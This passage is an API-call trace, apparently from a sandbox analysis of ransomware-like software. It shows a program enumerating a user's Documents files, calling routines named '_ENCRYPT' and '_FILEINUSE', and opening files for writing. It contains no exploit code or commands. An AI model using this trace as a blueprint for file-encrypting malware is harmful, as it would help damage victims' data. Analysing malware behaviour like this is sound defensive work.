lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.637] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.637] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.637] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.637] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.637] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.637] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.638] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.638] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.638] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0036.638] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.638] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0036.638] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.638] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.638] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.638] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.638] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.638] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.639] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.639] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.639] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.639] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.639] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.639] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.640] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.640] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.640] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.640] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.640] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.640] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.640] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.640] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.640] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.640] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.640] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.640] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ss", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vss", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".vss", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.641] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.641] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.641] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 0x7c20c0 [0036.641] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.641] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 0x7c20c0 [0036.641] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.641] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.641] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.641] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.641] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.641] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.641] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.641] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.642] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.642] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.642] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.642] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.643] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.643] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.643] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.643] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.643] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.643] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.643] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.643] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.643] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.643] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.643] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.643] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="co", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ico", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ico", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.644] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.644] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.644] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="folder.ico", cAlternateFileName="")) returned 0x7c20c0 [0036.644] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.644] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="folder.ico", cAlternateFileName="")) returned 0x7c20c0 [0036.644] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.644] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Shapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hapes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="apes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pes\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 